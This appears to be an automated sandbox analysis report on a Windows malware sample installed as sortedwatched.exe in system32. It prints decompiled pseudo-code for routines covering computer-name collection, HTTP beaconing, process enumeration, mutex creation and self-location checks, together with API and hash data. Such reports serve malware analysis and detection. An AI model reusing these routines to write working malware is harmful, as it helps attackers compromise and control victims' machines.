                  • Instruction Fuzzy Hash: 9081C6B4C06368DBEB21DF8699857CDBB70FB45704F6086C8C2693B214DB304A86CF99
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F43E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0040F43E(void* __ebx) {
				long _v8;
				char _v24;
				short _v56;
				int _t14;
				void* _t15;
				int _t22;
				char _t24;
				char* _t33;

				_v8 = 0x10;
				_t14 = GetComputerNameW( &_v56,  &_v8); // executed
				if(_t14 == 0) {
					L12:
					_v24 = 0x58;
					L13:
					_t15 = E004019AB(0x412e30);
					 *0x414664(0x416738, 0x104, _t15,  &_v24,  *0x4164e0);
					return L00401B09(_t15);
				}
				_t22 = WideCharToMultiByte(0, 0x400,  &_v56, 0xffffffff,  &_v24, 0x10, E004019AB(0x412b90), 0);
				L00401B09(_t19);
				if((0 | _t22 > 0x00000000) == 0) {
					goto L12;
				}
				_t33 =  &_v24;
				if(_v24 == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t24 =  *_t33;
					if(_t24 < 0x30 || _t24 > 0x39) {
						if(_t24 < 0x61 || _t24 > 0x7a) {
							if(_t24 < 0x41 || _t24 > 0x5a) {
								 *_t33 = 0x58;
							}
						}
					}
					_t33 = _t33 + 1;
				} while ( *_t33 != 0);
				goto L13;
			}











                  0x0040f448
                  0x0040f454
                  0x0040f45c
                  0x0040f4c8
                  0x0040f4c8
                  0x0040f4ce
                  0x0040f4d3
                  0x0040f4ef
                  0x0040f503
                  0x0040f503
                  0x0040f481
                  0x0040f490
                  0x0040f498
                  0x00000000
                  0x00000000
                  0x0040f49e
                  0x0040f4a1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040f4a3
                  0x0040f4a3
                  0x0040f4a3
                  0x0040f4a7
                  0x0040f4af
                  0x0040f4b7
                  0x0040f4bd
                  0x0040f4bd
                  0x0040f4b7
                  0x0040f4af
                  0x0040f4c0
                  0x0040f4c1
                  0x00000000

                  APIs
                  • GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                  • _snprintf.NTDLL ref: 0040F4EF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide_snprintf
                  • String ID: X
                  • API String ID: 4080658169-3081909835
                  • Opcode ID: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction ID: dbbf294783a5ce5e9b0548ade1bddf9532166b7a22268ff85b9ccd314504079c
                  • Opcode Fuzzy Hash: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction Fuzzy Hash: D5115B719011086ADB30DA699D01BEB37AC9B11708F50113BEC45F12D1E77C8A0A83EE
                  Uniqueness

                  Uniqueness Score: 0.17%

                  Function 0040F2EE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71fileUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 39%
                  			E0040F2EE(void* __eflags) {
				char _v524;
				char _v1044;
				short _v1564;
				char* _t17;
				int _t27;
				void* _t45;
				intOrPtr _t48;

				_t42 = E00401A52(0x412a00, 0x4bf67e71);
				E0040F190( &_v1044, _t9);
				L00401B09(_t42);
				_push( &_v524);
				_push(0);
				_push(0);
				_t48 =  *0x415f4c; // 0x0
				if(_t48 == 0) {
					 *0x414c14(0, 0x1c);
					_t43 = E00401A52(0x412df0, 0x4bf67e71);
					_t17 =  &_v524;
					 *0x4143a4(_t17, 0x104, _t15, _t17,  &_v1044);
					_t45 = _t45 + 0x14;
					L00401B09(_t43);
				} else {
					 *0x414c14(0, 0x29);
				}
				_t44 = E00401A52(0x412bb0, 0x4bf67e71);
				 *0x4143a4( &_v1564, 0x104, _t20,  &_v524,  &_v1044);
				L00401B09(_t44);
				_t27 = DeleteFileW( &_v1564); // executed
				return _t27;
			}










                  0x0040f30b
                  0x0040f315
                  0x0040f31c
                  0x0040f32c
                  0x0040f32f
                  0x0040f330
                  0x0040f331
                  0x0040f337
                  0x0040f347
                  0x0040f359
                  0x0040f362
                  0x0040f36c
                  0x0040f372
                  0x0040f377
                  0x0040f339
                  0x0040f33c
                  0x0040f33c
                  0x0040f388
                  0x0040f3a1
                  0x0040f3ac
                  0x0040f3b8
                  0x0040f3c4

                  APIs
                    • Part of subcall function 0040F190: lstrlenW.KERNEL32(00000000,00000000,00000000,00000104,?,?,0040F111), ref: 0040F1A1
                  • _snwprintf.NTDLL ref: 0040F36C
                  • _snwprintf.NTDLL ref: 0040F3A1
                  • DeleteFileW.KERNEL32(?), ref: 0040F3B8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf$DeleteFilelstrlen
                  • String ID: g8Cw
                  • API String ID: 3875729096-3103284439
                  • Opcode ID: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction ID: 657008bbddd63c106de985fdb09df341ec56487ec0cf543515cc0156050913b4
                  • Opcode Fuzzy Hash: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction Fuzzy Hash: 5C11B7B1A001189BC720E7619C449EB726DDB84355F0440BBF90AE3291EE385E858BED
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040140A, Relevance: 6.1, APIs: 4, Instructions: 90networkUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E0040140A(WCHAR* __ecx, short __edx, void* __eflags, intOrPtr _a4, WCHAR* _a8, void* _a16, long _a20, intOrPtr _a24) {
				WCHAR* _v8;
				WCHAR* _v12;
				void* _v16;
				WCHAR* _t15;
				void* _t16;
				void* _t19;
				void* _t21;
				int _t26;
				void* _t28;
				short _t30;
				void* _t31;
				void* _t32;
				void* _t43;
				WCHAR* _t45;
				WCHAR* _t46;
				void* _t47;

				_t30 = __edx;
				_v8 = __ecx;
				_t15 = E00401345(); // executed
				_t45 = 0;
				_t46 = _t15;
				_v12 = _t46;
				_t16 = InternetOpenW(_t46, 0, 0, 0, 0); // executed
				_v16 = _t16;
				if(_t16 != 0) {
					_t19 = InternetConnectW(_t16, _v8, _t30, 0, 0, 3, 0, 0); // executed
					_t31 = _t19;
					_v8 = _t31;
					if(_t31 != 0) {
						_t21 = E00401A52(0x412050, 0x42b61fdb);
						_t47 = _t21;
						_t37 =  !=  ? _t47 : 0;
						_t32 =  *0x415bc8(_t31,  !=  ? _t47 : 0, _a4, 0, 0, 0, E00401310(), 0);
						L00401B09(_t47);
						if(_t32 != 0) {
							_t26 = HttpSendRequestW(_t32, _a8, 0xffffffff, _a16, _a20); // executed
							if(_t26 != 0) {
								_t43 = 0x13;
								_t28 = E00401316(_t32, _t43);
								_t54 = _t28 - 0xc8;
								if(_t28 == 0xc8) {
									_t45 = E00401383(_t32, _a24, _t54);
								}
							}
							InternetCloseHandle(_t32); // executed
						}
						 *0x4158d8(_v8);
						_t46 = _v12;
					}
					 *0x4158d8(_v16);
				}
				E00401532(_t46);
				return _t45;
			}



















                  0x00401413
                  0x00401415
                  0x00401418
                  0x0040141d
                  0x0040141f
                  0x00401426
                  0x00401429
                  0x0040142f
                  0x00401434
                  0x00401445
                  0x0040144b
                  0x0040144d
                  0x00401452
                  0x00401462
                  0x00401468
                  0x0040147b
                  0x00401488
                  0x0040148a
                  0x00401491
                  0x0040149f
                  0x004014a7
                  0x004014ab
                  0x004014ae
                  0x004014b3
                  0x004014b8
                  0x004014c4
                  0x004014c4
                  0x004014b8
                  0x004014c7
                  0x004014c7
                  0x004014d0
                  0x004014d6
                  0x004014d6
                  0x004014dc
                  0x004014dc
                  0x004014e4
                  0x004014f1

                  APIs
                    • Part of subcall function 00401345: ObtainUserAgentString.URLMON(00000000,?,00000104), ref: 00401362
                  • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000,0040C6FC,00000000,00000104,?,?,?), ref: 00401429
                  • InternetConnectW.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00401445
                  • HttpSendRequestW.WININET(00000000,000000FF,000000FF,?,?), ref: 0040149F
                  • InternetCloseHandle.WININET(00000000), ref: 004014C7
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                  • String ID:
                  • API String ID: 1741791824-0
                  • Opcode ID: 0d54c19cca61c3b923c66ea9474d8b0119caa62e74d77989c331ed76ff960556
                  • Instruction ID: de09d5a240a5615813d0bbbfcfa054314b958373cb91725100eb0eecfb42de7b
                  • Opcode Fuzzy Hash: 0d54c19cca61c3b923c66ea9474d8b0119caa62e74d77989c331ed76ff960556
                  • Instruction Fuzzy Hash: 9E216271A00245FBDF206FA69C49DAF7ABDDBC5760B10813EB905A23A1DA788D508B64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401943, Relevance: 6.0, APIs: 4, Instructions: 37processCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401943(void* __edx) {
				void* _v560;
				void* _t5;
				struct tagPROCESSENTRY32W* _t6;
				int _t7;
				void* _t9;
				void* _t12;
				void* _t13;

				_t12 = __edx; // executed
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t13 = _t5;
				if(_t13 != 0xffffffff) {
					_t6 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t13, _t6); // executed
					while(_t6 != 0) {
						_t9 = E00402255( &_v560, _t12); // executed
						if(_t9 != 0) {
							_t6 = Process32NextW(_t13,  &_v560); // executed
							continue;
						}
						break;
					}
					_t7 = CloseHandle(_t13); // executed
					return _t7;
				}
				return _t5;
			}










                  0x00401952
                  0x00401954
                  0x0040195a
                  0x0040195f
                  0x00401961
                  0x00401967
                  0x00401973
                  0x00401989
                  0x00401995
                  0x0040199c
                  0x00401983
                  0x00000000
                  0x00401983
                  0x00000000
                  0x0040199c
                  0x0040199f
                  0x00000000
                  0x0040199f
                  0x004019aa

                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401954
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00401973
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401983
                  • CloseHandle.KERNEL32(00000000), ref: 0040199F
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(0040C6D4,00000000,?,?,0040199A,0000022C,0040C6D4), ref: 00402273
                    • Part of subcall function 00402255: GetCurrentProcessId.KERNEL32(?,0040199A,0000022C,0040C6D4), ref: 00402284
                    • Part of subcall function 00402255: lstrcpyW.KERNEL32(00000004,0000022C), ref: 004022B6
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 210870473-0
                  • Opcode ID: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction ID: 16848b0ed7bca5f6eaa718ca54d67b5e4b9d7aaec9667f6a8c5e1db911b667c7
                  • Opcode Fuzzy Hash: 32a748f4d19bd9fcb3bffcca5a552f4bc6dc848702525874167d515a2f84efd4
                  • Instruction Fuzzy Hash: 93F096715011287AD720AB79AC0CFEF7B7CDB49711F1081B2ED05F21D0D7388A058A99
                  Uniqueness

                  Uniqueness Score: 0.04%

                  Function 0040C54E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040C54E(void* __eflags) {
				short _v132;
				void* _t5;
				void* _t10;

				_t5 = E00401A52(0x412340, 0x72fc3a35);
				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
				L00401B09(_t5);
				_t10 = CreateMutexW(0, 0,  &_v132); // executed
				 *0x41365c = _t10;
				return 0 | _t10 != 0x00000000;
			}






                  0x0040c562
                  0x0040c576
                  0x0040c581
                  0x0040c58e
                  0x0040c596
                  0x0040c5a6

                  APIs
                  • _snwprintf.NTDLL ref: 0040C576
                  • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C58E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction ID: 36c13beeff52031c9d9f833bd8c6959bb0ee47b01addbbb580c4d20d437467e3
                  • Opcode Fuzzy Hash: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction Fuzzy Hash: F5F0EC717041145BD7146BA96C06BEA376CEB44305F00817EFA09E72D0EE34D91047DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C4F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040C4F5(void* __eflags) {
				short _v132;
				void* _t5;
				void* _t10;

				_t5 = E00401A52(0x4128e0, 0x72fc3a35);
				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
				L00401B09(_t5);
				_t10 = CreateMutexW(0, 0,  &_v132); // executed
				 *0x41548c = _t10;
				return 0 | _t10 != 0x00000000;
			}






                  0x0040c509
                  0x0040c51d
                  0x0040c528
                  0x0040c535
                  0x0040c53d
                  0x0040c54d

                  APIs
                  • _snwprintf.NTDLL ref: 0040C51D
                  • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C535
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction ID: 146b9e719d585fa1db09a36da7744ebe958f35a2f64565dee515f9001fd86055
                  • Opcode Fuzzy Hash: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction Fuzzy Hash: 3FF0E5717442149BD700ABA9AC06BEE36ACEB44305F00803EFA09EB2D0EE3498148BDD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00402561, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402561(signed int _a8, signed int _a12) {
				void* _t6;

				_t6 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 * _a12); // executed
				return _t6;
			}




                  0x00402575
                  0x0040257c

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,?), ref: 0040256E
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402575
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction ID: 7b0aceb4be34622b36046658aba6f4cfe0c30366996fb5ad577a8c43a0e85ff0
                  • Opcode Fuzzy Hash: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction Fuzzy Hash: 98C08C32100308ABCB009FD8ED49DAA77ACFB48A02F00C010BA18CA090DA30F6008BA4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004014F2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6memoryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004014F2(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
				return _t2;
			}




                  0x004014fc
                  0x00401502

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction ID: f421614fde833f2996113b85f7123fd9be9ad5eab0a4f509e971bf896a641baa
                  • Opcode Fuzzy Hash: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction Fuzzy Hash: 72A012B16001009BDE001FA49D0DA553518B740703F00C054710590090ED6422008764
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004014F2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6memoryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004014F2(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
				return _t2;
			}




                  0x004014fc
                  0x00401502

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction ID: f421614fde833f2996113b85f7123fd9be9ad5eab0a4f509e971bf896a641baa
                  • Opcode Fuzzy Hash: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction Fuzzy Hash: 72A012B16001009BDE001FA49D0DA553518B740703F00C054710590090ED6422008764
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C682, Relevance: 4.6, APIs: 3, Instructions: 86stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0040C682(void* __edi, void* __eflags) {
				char _v12;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v48;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t49;
				void* _t55;
				signed int _t60;
				signed int _t78;
				void* _t93;
				void* _t94;
				void* _t95;

				_t95 = __eflags;
				_t93 = __edi;
				_t5 = GetTickCount() % 0xea60 + 0xcd140; // 0xcd140
				_t94 = _t5;
				_t42 = E0040FA9B();
				_v80 = _v80 & 0x00000000;
				_v76 = _t42;
				_v72 =  *0x413b6c(_t42);
				_t44 = E00402398(); // executed
				_v68 = _t44;
				_v64 = E00401E04();
				_v60 = E0040FA95();
				E004022D2( &_v56); // executed
				E0040FCF6( &_v48);
				_t49 = E0040C901( &_v20,  &_v80, _t95);
				_t96 = _t49;
				if(_t49 != 0) {
					_t55 = E00406104(_t96,  &_v20,  &_v12); // executed
					if(_t55 == 0) {
						_t33 = GetTickCount() % 0xbb8;
						__eflags = _t33;
						_t94 = 0xbb8 + _t33;
						E00406297();
					} else {
						_t60 = _v80;
						_t78 = 3;
						_t98 = _t60 % _t78;
						if(_t60 % _t78 == 0) {
							E0040F9DF();
						}
						if(E0040C9A3( &_v12,  &_v40, _t98) != 0 && _v40 == 0) {
							L0040FDBC();
							_t91 = _v32;
							_t101 = _v32;
							if(_v32 != 0) {
								E0040F99A(_v36, _t91, _t93, _t94, _t101);
							}
							_t92 = _v24;
							_t102 = _v24;
							if(_v24 != 0) {
								E0040FD40(_v28, _t92, _t102);
								_t94 = 0;
							}
						}
						E00401532(_v12);
					}
					E00401532(_v20);
				}
				E00401532(_v48);
				E00401532(_v56);
				return _t94;
			}




























                  0x0040c682
                  0x0040c682
                  0x0040c698
                  0x0040c698
                  0x0040c69e
                  0x0040c6a3
                  0x0040c6a8
                  0x0040c6b1
                  0x0040c6b4
                  0x0040c6b9
                  0x0040c6c1
                  0x0040c6cc
                  0x0040c6cf
                  0x0040c6d7
                  0x0040c6e2
                  0x0040c6e7
                  0x0040c6e9
                  0x0040c6f7
                  0x0040c700
                  0x0040c766
                  0x0040c766
                  0x0040c768
                  0x0040c76b
                  0x0040c702
                  0x0040c702
                  0x0040c709
                  0x0040c70c
                  0x0040c70e
                  0x0040c710
                  0x0040c710
                  0x0040c722
                  0x0040c72a
                  0x0040c72f
                  0x0040c732
                  0x0040c734
                  0x0040c739
                  0x0040c739
                  0x0040c73e
                  0x0040c741
                  0x0040c743
                  0x0040c748
                  0x0040c74d
                  0x0040c74d
                  0x0040c743
                  0x0040c752
                  0x0040c752
                  0x0040c773
                  0x0040c773
                  0x0040c77b
                  0x0040c783
                  0x0040c78e

                  APIs
                  • GetTickCount.KERNEL32(00000102,?,?,?,?,?,?,?,?,?,?,?,?,?,0040C7C7), ref: 0040C689
                  • lstrlen.KERNEL32(00000000), ref: 0040C6AB
                    • Part of subcall function 00402398: RtlGetVersion.NTDLL(?), ref: 004023B2
                    • Part of subcall function 00402398: GetNativeSystemInfo.KERNEL32(?), ref: 004023BC
                    • Part of subcall function 004022D2: lstrlenW.KERNEL32(0040C6D8,00000000,000CD140,00000104,?,?,?,0040C6D4), ref: 00402309
                    • Part of subcall function 00406104: _snwprintf.NTDLL ref: 004061A8
                  • GetTickCount.KERNEL32 ref: 0040C759
                    • Part of subcall function 0040F9DF: _snwprintf.NTDLL ref: 0040FA1D
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick_snwprintflstrlen$InfoNativeSystemVersion
                  • String ID:
                  • API String ID: 1305535675-0
                  • Opcode ID: a77bdd8919f3a98efa0655e863ed0fe1dd9cf25eb4df3c2379527960c1d06637
                  • Instruction ID: 81ffacd0aac2abb408ebbc200e15fd6d71b5808331c641d14e665e1cf29e0c87
                  • Opcode Fuzzy Hash: a77bdd8919f3a98efa0655e863ed0fe1dd9cf25eb4df3c2379527960c1d06637
                  • Instruction Fuzzy Hash: 80317E31E0010A9BCF14EBA6D8955EEB7B6AF84304F54813FE402776D1EF38A906CB58
                  Uniqueness

                  Uniqueness Score: 0.05%

                  Function 0040F92D, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 34stringUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F92D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr _t1;
				int _t9;
				intOrPtr _t16;
				void* _t20;
				void* _t24;

				_t24 = __eflags;
				_t20 = __edx;
				_t16 = __ecx;
				_t1 =  *0x415488; // 0x3c4e0000
				 *0x4164e0 = _t1;
				E0040F16B();
				E0040F149();
				E0040F26C();
				E0040F292();
				E0040F3C5(); // executed
				E0040F43E(__ebx); // executed
				E0040F2EE(_t24); // executed
				_t9 = lstrcmpiW("C:\Windows\system32\sortedwatched.exe", 0x416840);
				if(_t9 != 0) {
					E0040F63A(_t16, _t20, __edi, __eflags);
					__eflags =  *0x415f4c;
					if( *0x415f4c == 0) {
						__eflags = 0;
						E00401CC2(0x416840, 0, _t16, 0);
					} else {
						E0040F7A0();
					}
					__eflags = 1;
					return 1;
				} else {
					return _t9;
				}
			}








                  0x0040f92d
                  0x0040f92d
                  0x0040f92d
                  0x0040f92d
                  0x0040f933
                  0x0040f938
                  0x0040f93d
                  0x0040f942
                  0x0040f947
                  0x0040f94c
                  0x0040f951
                  0x0040f956
                  0x0040f966
                  0x0040f96e
                  0x0040f972
                  0x0040f977
                  0x0040f97e
                  0x0040f98a
                  0x0040f98e
                  0x0040f980
                  0x0040f980
                  0x0040f980
                  0x0040f997
                  0x0040f999
                  0x0040f971
                  0x0040f971
                  0x0040f971

                  APIs
                    • Part of subcall function 0040F16B: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                    • Part of subcall function 0040F16B: CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                    • Part of subcall function 0040F149: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\system32\sortedwatched.exe,00000104,00000000,00000102,0040F942,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F162
                    • Part of subcall function 0040F292: _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F3C5: CreateFileW.KERNEL32(C:\Windows\system32\sortedwatched.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                    • Part of subcall function 0040F3C5: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                    • Part of subcall function 0040F3C5: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                    • Part of subcall function 0040F3C5: GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                    • Part of subcall function 0040F3C5: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                    • Part of subcall function 0040F3C5: UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                    • Part of subcall function 0040F3C5: CloseHandle.KERNEL32(00000000), ref: 0040F42D
                    • Part of subcall function 0040F3C5: CloseHandle.KERNEL32(00000000), ref: 0040F434
                    • Part of subcall function 0040F43E: GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                    • Part of subcall function 0040F43E: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                    • Part of subcall function 0040F43E: _snprintf.NTDLL ref: 0040F4EF
                    • Part of subcall function 0040F2EE: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,?), ref: 0040F33C
                    • Part of subcall function 0040F2EE: _snwprintf.NTDLL ref: 0040F3A1
                    • Part of subcall function 0040F2EE: DeleteFileW.KERNEL32(?), ref: 0040F3B8
                  • lstrcmpiW.KERNEL32(C:\Windows\system32\sortedwatched.exe,C:\Windows\system32\sortedwatched.exe,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F966
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
